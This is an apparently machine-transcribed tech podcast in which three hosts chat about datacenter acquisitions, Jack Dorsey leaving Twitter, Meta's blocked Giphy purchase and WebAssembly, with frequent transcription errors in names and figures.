Brad Kirby:take care of global infrastructure partners. But Cyrus one for combined 15 billion. And then American Tower came in? Yeah, the core site for 10 billion, which was formerly I believe, the largest acquisition on record. And Blackstone bought cute. Yes, it was last year. Yeah. But that?
Dean Nelson:No, that was this year, right. Just in the last couple months. Yeah. So if you think about it, this is a bigger, there's $35 billion worth of datacenter acquisitions just in the last two months, 35 billion, all private equity. It's just solidifying what's going on and the money being poured into it, right infrastructure funds and expansion. And they love this asset class. Because these are long term investments are going to have consistent return returns.
James Thomason:And you need them, especially ones like CoreSite course, it's an interesting one, because they through the last 20 years managed to acquire some of the premier properties where there are peering and internet exchange points and just a very high density of carriers in one space. So much in fact that they are able to charge a premium for the space and power that the lease in the space, if you want to get in there and connect with their networks be prepared to pay
Dean Nelson:five times the normal hyperscale price. Yeah, five exageration
James Thomason:through the nose. And they can and will raise prices going forward as well. So
Dean Nelson:that's a supply demand thing, though, if you think about one wheelchair, in LA yeah, that's,
James Thomason:that's exactly what I was thinking of. By the way, when I was thinking CoreSite was one of those. It is
Dean Nelson:the I think, one of if not the most connected internet exchanges in the world. And it's operated by CoreSite. It's owned by somebody else. Right. The building itself actually doesn't see our partners on the building. I think they do actually. So yeah, yeah. Okay. Okay. Got it. So now they own core site, which is the, the one that owned all of the exchange interconnections within that actual building itself. That's a really interesting acquisition. Oh, no, no, sorry, Whitman gi partners, but Cyrus one, but they own now I'm confused. They own one. Well, sir. That's interesting. And then structure infrastructure usually, yeah, so forgot his name. Yeah, right. One of the guy that I know works at gi partners, John, he ran Infomart. He's an investor in my company.
Brad Kirby:There's gi partners and his global infrastructure partners. So whose gi partner zones are the Wilshire and global infrastructure partners. It's just based in New York.
Dean Nelson:Got it? That's okay. I'm mixing that up. Then. Got it. All right. Interesting. Okay, good. So
James Thomason:we sorted that out. I was Yeah.
Dean Nelson:Yeah, but KKR and global infrastructure partners bought Cyrus one. Oh, Okay, and then you've got American Tower, the core site. That's a totally different type of approach. If you think about American Tower, though the largest tower company in the country or the world, right? They have like 45,000 Tower sites or something like that. They're up? I think it is. Yeah, yeah. But the way they explained this in there is that because they are the edge of the internet, where all of these things are distributed. Now, they want to be the at the core, and they bought core site, because they have the largest concentration of internet exchanges in their portfolio. So pretty smart move when you think about the other competitors. So, but this makes me think, who's next? We're not gonna speculate. But there's only so many data center companies.
James Thomason:I know too much. I dare not say, Well, if you don't have
Brad Kirby:any information, you know, too many people just really be speculating in public, I would say, Yeah,
James Thomason:I honestly do not say anything about anything. I know
Dean Nelson:nothing. I know nothing. I have no zero. Yes. All I know is there's going to be some actions going on. I mean, I didn't expect to have$25 billion landed one Monday, right. And those kinds of things. We knew that some of these people were shopping and there was other interests and things and this is lots of conversations that come back around. But it's a hot, hot, hot space.
James Thomason:Well, ladies and gentlemen, the absentee landlord of social media has left the building. That's right. Jack Dorsey, his Twitter has exited, and handed over the reins to another CEO.
Dean Nelson:Thank you. Thank you. Let me tweet. Yeah.
James Thomason:Right. You'll be able to tweet about that immediately. Yeah, tweet a victory lap. So. So the interesting thing here is he left to pursue square full time, which I think is great, because before COVID, this is serious. Jack was going to move out into the middle of the desert in Africa somewhere into like, a meditation hut while still running both companies. So I think that there's been an awakening. And people have realized that there's while the rest of the market is up 130 plus percent, Twitter stock has gone nowhere. So I think that pressure has finally come to bear and Jack is out. So I don't think this helps Twitter. I think they are proverbially
Brad Kirby:screwed. Really. Why is that?
James Thomason:Well, I just think that what they have done and what other social media has done visa V censorship and labeling people's tweets, presumably objectively as misinformation, of course, it's been revealed now that all that's just the opinion of whatever, whatever random editor contractor happens to have your tweet pop up when someone flags it, and the case of Facebook in that particular case, but yeah, I think that this form of social media has very limited utility going forward. I think that's everyone's experiencing kind of a burnout from it. And probably we'll see a migration some more concentrated and smaller platforms that just connect you with the people that you know, and actually know in real life and and maybe don't connect you with randos from the internet that want to weigh in and opine on something that you are writing to your friends. I think you know, of course, for celebrities and the proverbial blue checks of the world. It'll continue to be a platform for connecting to their audiences to some degree, but there's a lot of competition there. You got Tik Tok, you've got Instagram, Facebook, you're going to have meta. So I just think that this this particular form of media it's days are numbered. In shorts short form
Brad Kirby:are twice as much right there were the 100 billion compared to
James Thomason:Yeah, well square square is like a real company right? I mean, they're they're real company. They rebranded right so they're not gonna have square anymore the box right there box kill me now. When they got acquired by box they rebranded themselves to box wasn't box Yes, like that block? Block Yeah,
Dean Nelson:I would say box might have a problem with that.
James Thomason:They rewritten the rebranded this block. So the longer square there are now block, got it, they block it. Okay. I think that's kind of the lay on the idea that is three dimensional and they're acquiring more companies and they're doing more than just square set out to do in the first place. So now they're locked into kind of like Facebook becoming meta. It's the trendy thing to do, because Zuckerberg beat him to the punch, but he has to do it also. I don't know.
Brad Kirby:I wonder if Twitter rebrands
Dean Nelson:they could be called Omni verse. That's that's a one on one up meta.
Brad Kirby:That would be it would be Nvidia. Oh,
Dean Nelson:yeah. Okay. They also want to become Omicron. That would be bad. Yeah.
James Thomason:What else happened? Mehta has failed to acquire giffy. That's kind of a ribbon right? My breath failed.
Brad Kirby:Yes. Small acquisitions, only 400 million. If you look at what they acquired Instagram, and WhatsApp for on a relative basis from a value perspective. It's a bit surprising and Oculus two. They're all substantially more in terms of the valuation so they paid 90 billion for WhatsApp. 2 billion for Oculus I think back in 2014. Instagram is only like 715 million back 2012 Or something that was
James Thomason:only 700 million. Yeah, but think about it. Only 400 million for giffy.
Brad Kirby:I like to let the FCC commissioner or Packer slaughter says that she thinks the serial acquisition has become a Pac Man strategy of just eating. And if you think about it, what do you use for gifts? Like other than giffy? Like, I don't know, if you're on, like Slack or any other messenger, like, usually it's giffy. Right?
James Thomason:I mean, there's a million of these things that were in, there aren't the same thing. But there are but like, are they really competitive? But again, is the market for like, short one to two second animated GIFs in text stream is going to be like a huge thing. 1010 years from now I you know, I don't know I view these kind of plays is just like a way of soaking up more users into into the platform. It's more of an eyeballs thing, right?
Brad Kirby:Think about the meta aspects of it, though, when you go download it and build it into the AR, which they've already done. On that, and Facebook already, where you can build in the AR aspects. So I think, I think that's the play there. And probably some of the IP that was there was maybe I just, it's interesting that the they blocked it as an anti trust matter. That actually
Dean Nelson:because of what's been going on with Instagram and all the other platforms that are coming together WhatsApp, they didn't want giffy to be absorbed into the meta machine. Right. That's what they stopped. Yeah, I
Brad Kirby:think that's yeah. Yeah.
James Thomason:Yeah. Be more of that. We need more of that.
Dean Nelson:They do. I think Hackman strategy,
James Thomason:I've said it before we broke up Standard Oil at only 90%. Mark administration. I don't think we need to let Facebook or Google get to 100. And their respective markets before we start turning down, the world will be a better place, the water will be oxygenated. So I'm glad that they got blocked, although I feel bad for the giffy people who are not collecting a $40 million check. That's the rub, right is that entrepreneurs will start companies to make lots of money. And if we block acquisitions, then that doesn't happen, necessarily as fast or as big as it could. What did that limit write one of them? Well, according to the new stack, the top internet technology of 2021 was WebAssembly. Who could have seen this coming who could have seen it coming, but this is fitting because our next guest on the next week podcast is going to be the co founder of the bike Alliance. Miko alliance is an organization that is shepherding the development of WebAssembly and many related technologies in that ecosystem. My own company edX recently joined WebAssembly, or the bytecode. Alliance to work on WebAssembly. It works at fastly fast as a competitor, but that's okay. We feel very good about competitors that are smart doing incredible things. And we're very excited to be part of the Alliance. I should say the alliance is getting pretty big, right? I mean, Microsoft is in the Alliance. How many members are we up to Brad the Alliance?
Brad Kirby:So Google? Yeah, you guys are friends of Definity, they're
James Thomason:Definity. dfinity. Other competitors, I tell you
Brad Kirby:that thing. It's about 2020 companies but it's Brazil has like those in there too. So the whole team of fastly pretty much came from Mozilla their entire web assembly. Yes, yeah, including one of the cofounders of assembly, the writers of the actual specs back and when it was released in 2017.
James Thomason:We've talked about this before web assembly is a new technology that as you might guess from the name born in the web for the client side, what it is, is a new type of virtual machine target for compiling code and running it. So not unlike Java. There's a Java virtual machine that runs everywhere. WebAssembly is a virtual machine that can run lean me in your browser. The difference is, the code is very close to machine code itself. So it's very fast. It works very well for retargeting languages that are low level languages like rust or C C++ can be very, very easily targeted and have been targeted for web assembly. And I personally think this is one of the most transformative technologies that we'll see in the decade. Since JavaScript. Since JavaScript since since Java really after I you know, kicked Java and Ruby, like ASP verbal teeth, the proverbial teeth. Yep. But truly the next decade, applications are going to increasingly be ported on to WebAssembly I think as a common target. The explosion of interest in this space is just phenomenal, the witness, we're excited to be a part of it. And I'm very fortunate that he's willing to come on to the next wave and talk to us about it. I think he will share a tremendous amount of insight since he's been there from the beginning. And we're personally more Johnny come lately as well, not really. We've been doing web assembly now for two years, which I think is ancient in the web assembly space.
Dean Nelson:But you know, what else is on that list was in video number five. There's Omniverse. As we just said, it sounds like we need to get a couple guests on a Metaverse and then Omniverse Yeah, and then we're gonna bring on Omicron.
Brad Kirby:I seem to recall you knew one of the top 30 most influential in the space or you received an email. So
Dean Nelson:Oh, yeah, that's right. That's right. We'll go see what we can. We can get onto the show.
Brad Kirby:I think we can get those guys back to back here. Next week. That'd be fun. That'd be good,
James Thomason:too. Versus Awesome. Well, Dean, what about the Skinwalker Ranch guy can Getting rid of Hell yeah,
Dean Nelson:I gotta reach back out to him. Yes, we got to do that. Yes Skinwalker Ranch.
James Thomason:We haven't had any good UFO News or Sasquatch news in a while and we got to get to the Skinwalker guy. That'd be amazing. Folks, if you enjoy podcasts such as this one where we keep you informed about the latest trends in tech and we bring you the best and brightest leaders in the industry who are truly transforming the world. Please do give us a like it helps us grow our audience. We are sponsored as ever by infrastructure Masons whose uniting builders of the digital age, learn how you can participate by going on the web to imasons.org. That's iMasons dot ORG and by EDJX, we are building a new type of distributed computing platform to create smarter, faster websites, data pipelines on our secure Global Edge platform, visit us on the web at EDJX.IO that's EDJX.io.